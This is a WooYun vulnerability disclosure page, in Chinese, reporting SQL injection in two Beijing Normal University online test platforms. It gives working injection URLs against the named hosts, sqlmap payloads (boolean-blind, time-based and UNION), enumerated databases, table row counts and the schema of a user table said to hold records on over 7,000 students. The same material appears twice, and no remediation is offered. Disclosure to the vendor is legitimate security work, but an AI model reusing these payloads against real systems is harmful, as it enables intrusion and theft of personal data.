当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0166120

漏洞标题:北京师范大学注入打包

相关厂商:北京师范大学

漏洞作者: 路人甲

提交时间:2015-12-30 19:02

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-30: 细节已通知厂商并且等待厂商处理中
2016-01-04: 厂商已经确认,细节仅向厂商公开
2016-01-14: 细节向核心白帽子及相关领域专家公开
2016-01-24: 细节向普通白帽子公开
2016-02-03: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

北京师范大学(Beijing Normal University)简称“北师大”,由中华人民共和国教育部直属,中央直管副部级建制,位列“211工程”、“985工程”,入选国家“珠峰计划”、“2011计划”、“111计划”、“卓越法律人才教育培养计划”,设有研究生院,是一所以教师教育、教育科学和文理基础学科为主要特色的综合性全国重点大学。

详细说明:

1)北京师范大学共训班网上测试平台:
http://gxb.bnu.edu.cn/Index.php/Notice/shownot?nid=-37%20%20union%20select%201,user%28%29,database%28%29,4

GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 41 HTTP(s) requ
ests:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=37 AND 5521=5521
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: nid=37 AND (SELECT * FROM (SELECT(SLEEP(1)))jqxg)
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: nid=-3919 UNION ALL SELECT NULL,CONCAT(0x71627a6271,0x694d577870716
8434d69,0x716a767a71),NULL,NULL--
---
[15:06:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.12
[15:06:45] [INFO] fetching database names
[15:06:46] [INFO] the SQL query used returns 3 entries
[15:06:48] [INFO] retrieved: information_schema
[15:06:49] [INFO] retrieved: dangxiao_exam
[15:06:50] [INFO] retrieved: test
available databases [3]:
[*] dangxiao_exam
[*] information_schema
[*] test


1.png


2)北京师范大学校规校纪测试平台:
http://ldsr.bnu.edu.cn/Index.php/Notice/shownot?nid=-27%20union%20select%201,user%28%29,database%28%29,4

GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 39 HTTP(s) requ
ests:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=27 AND 5159=5159
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: nid=27 AND (SELECT * FROM (SELECT(SLEEP(1)))fekI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: nid=-1429 UNION ALL SELECT NULL,CONCAT(0x7170706b71,0x4952726d6c614
34e6f71,0x7170627871),NULL,NULL--
---
[15:03:21] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] exam
[*] information_schema
[*] test


不忍直视,这么多表
lb_user表泄露7000多学生的姓名,院系,班级等信息

Database: exam
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| lb_useranswer        | 464898  |
| lb_usertestlog       | 18189   |
| lb_usergroup         | 17990   |
| lb_user              | 7488    |  <————————
| lb_usertestlog_all   | 4766    |
| dede_sys_enum        | 3347    |
| lb_userquestions     | 2658    |
| lb_answers           | 743     |
| dede_area            | 482     |
| lb_questions         | 351     |
| dede_sysconfig       | 150     |
| dede_archives        | 136     |
| dede_arctiny         | 136     |
| dede_addonarticle    | 135     |
| dede_asktype         | 35      |
| dede_arctype         | 21      |
| dede_stepselect      | 15      |
| dede_scores          | 12      |
| lb_notice            | 11      |
| dede_co_mediaurls    | 10      |
| lb_groups            | 10      |
| dede_uploads         | 9       |
| dede_arcatt          | 8       |
| dede_arcrank         | 8       |
| dede_flinktype       | 8       |
| dede_plus            | 8       |
| dede_sys_module      | 7       |
| dede_ask             | 6       |
| dede_channeltype     | 6       |
| dede_shops_paytype   | 5       |
| dede_payment         | 4       |
| dede_shops_delivery  | 4       |
| dede_tagindex        | 4       |
| dede_taglist         | 4       |
| lb_tests             | 4       |
| test                 | 4       |
| dede_admintype       | 3       |
| dede_co_onepage      | 3       |
| dede_flink           | 3       |
| dede_guestbook       | 3       |
| dede_moneycard_type  | 3       |
| dede_mytag           | 3       |
| dede_search_keywords | 3       |
| dede_store_groups    | 3       |
| lb_adminuser         | 3       |
| dede_freelist        | 2       |
| dede_member_model    | 2       |
| dede_member_stowtype | 2       |
| dede_sys_set         | 2       |
| dede_addonspec       | 1       |
| dede_admin           | 1       |
| dede_arccache        | 1       |
| dede_arcmulti        | 1       |
| dede_askanswer       | 1       |
| dede_co_note         | 1       |
| dede_homepageset     | 1       |
| dede_member          | 1       |
| dede_member_group    | 1       |
| dede_member_person   | 1       |
| dede_member_space    | 1       |
| dede_member_tj       | 1       |
| dede_member_type     | 1       |
| dede_myad            | 1       |
| dede_mynews          | 1       |
| dede_softconfig      | 1       |
| dede_vote            | 1       |
+----------------------+---------+
Database: exam
Table: lb_user
[9 columns]
+-----------+---------------+
| Column    | Type          |
+-----------+---------------+
| id        | mediumint(10) |
| password  | varchar(32)   |
| regip     | varchar(20)   |
| regtime   | datetime      |
| useremail | varchar(20)   |
| username  | varchar(15)   |
| xingming  | varchar(45)   |
| yuanxi    | varchar(45)   |
| zhuanye   | varchar(45)   |
+-----------+---------------+


2.png


漏洞证明:

1)北京师范大学共训班网上测试平台:
http://gxb.bnu.edu.cn/Index.php/Notice/shownot?nid=-37%20%20union%20select%201,user%28%29,database%28%29,4

GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 41 HTTP(s) requ
ests:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=37 AND 5521=5521
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: nid=37 AND (SELECT * FROM (SELECT(SLEEP(1)))jqxg)
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: nid=-3919 UNION ALL SELECT NULL,CONCAT(0x71627a6271,0x694d577870716
8434d69,0x716a767a71),NULL,NULL--
---
[15:06:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.12
[15:06:45] [INFO] fetching database names
[15:06:46] [INFO] the SQL query used returns 3 entries
[15:06:48] [INFO] retrieved: information_schema
[15:06:49] [INFO] retrieved: dangxiao_exam
[15:06:50] [INFO] retrieved: test
available databases [3]:
[*] dangxiao_exam
[*] information_schema
[*] test


1.png


2)北京师范大学校规校纪测试平台:
http://ldsr.bnu.edu.cn/Index.php/Notice/shownot?nid=-27%20union%20select%201,user%28%29,database%28%29,4

GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 39 HTTP(s) requ
ests:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=27 AND 5159=5159
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: nid=27 AND (SELECT * FROM (SELECT(SLEEP(1)))fekI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: nid=-1429 UNION ALL SELECT NULL,CONCAT(0x7170706b71,0x4952726d6c614
34e6f71,0x7170627871),NULL,NULL--
---
[15:03:21] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] exam
[*] information_schema
[*] test


不忍直视,这么多表
lb_user表泄露7000多学生的姓名,院系,班级等信息

Database: exam
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| lb_useranswer        | 464898  |
| lb_usertestlog       | 18189   |
| lb_usergroup         | 17990   |
| lb_user              | 7488    |  <————————
| lb_usertestlog_all   | 4766    |
| dede_sys_enum        | 3347    |
| lb_userquestions     | 2658    |
| lb_answers           | 743     |
| dede_area            | 482     |
| lb_questions         | 351     |
| dede_sysconfig       | 150     |
| dede_archives        | 136     |
| dede_arctiny         | 136     |
| dede_addonarticle    | 135     |
| dede_asktype         | 35      |
| dede_arctype         | 21      |
| dede_stepselect      | 15      |
| dede_scores          | 12      |
| lb_notice            | 11      |
| dede_co_mediaurls    | 10      |
| lb_groups            | 10      |
| dede_uploads         | 9       |
| dede_arcatt          | 8       |
| dede_arcrank         | 8       |
| dede_flinktype       | 8       |
| dede_plus            | 8       |
| dede_sys_module      | 7       |
| dede_ask             | 6       |
| dede_channeltype     | 6       |
| dede_shops_paytype   | 5       |
| dede_payment         | 4       |
| dede_shops_delivery  | 4       |
| dede_tagindex        | 4       |
| dede_taglist         | 4       |
| lb_tests             | 4       |
| test                 | 4       |
| dede_admintype       | 3       |
| dede_co_onepage      | 3       |
| dede_flink           | 3       |
| dede_guestbook       | 3       |
| dede_moneycard_type  | 3       |
| dede_mytag           | 3       |
| dede_search_keywords | 3       |
| dede_store_groups    | 3       |
| lb_adminuser         | 3       |
| dede_freelist        | 2       |
| dede_member_model    | 2       |
| dede_member_stowtype | 2       |
| dede_sys_set         | 2       |
| dede_addonspec       | 1       |
| dede_admin           | 1       |
| dede_arccache        | 1       |
| dede_arcmulti        | 1       |
| dede_askanswer       | 1       |
| dede_co_note         | 1       |
| dede_homepageset     | 1       |
| dede_member          | 1       |
| dede_member_group    | 1       |
| dede_member_person   | 1       |
| dede_member_space    | 1       |
| dede_member_tj       | 1       |
| dede_member_type     | 1       |
| dede_myad            | 1       |
| dede_mynews          | 1       |
| dede_softconfig      | 1       |
| dede_vote            | 1       |
+----------------------+---------+
Database: exam
Table: lb_user
[9 columns]
+-----------+---------------+
| Column    | Type          |
+-----------+---------------+
| id        | mediumint(10) |
| password  | varchar(32)   |
| regip     | varchar(20)   |
| regtime   | datetime      |
| useremail | varchar(20)   |
| username  | varchar(15)   |
| xingming  | varchar(45)   |
| yuanxi    | varchar(45)   |
| zhuanye   | varchar(45)   |
+-----------+---------------+


2.png


修复方案:

你们更专业。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-04 08:01

厂商回复:

感谢

最新状态:

暂无